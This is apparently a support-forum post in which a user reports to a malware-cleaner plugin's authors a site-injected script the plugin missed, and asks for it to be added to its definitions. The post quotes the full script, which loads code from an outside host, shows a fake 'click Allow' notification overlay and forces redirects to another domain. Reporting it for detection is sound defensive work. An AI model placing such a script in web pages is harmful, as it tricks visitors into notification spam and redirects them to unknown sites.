• Resolved imemine

    (@imemine)


    Hi,

    Thanks, it cleans my dolohen hack, but doesn’t clean this one:

    <script>
                    const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
                    const overlay = {"delay":1000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
                    const s = document.createElement('script');
                    s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
                    s.onload = (sdk) => {
                        sdk.updateOptions({overlay, overlayTranslations})
                        sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
                        sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
                        sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
                        sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
                        sdk.onNotificationUnsupported(() => {});
                    }
                    document.head.appendChild(s);
                </script>

    Please add to Definition update 🙂

    Thanks

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)

The topic ‘Great Plugin’ is closed to new replies.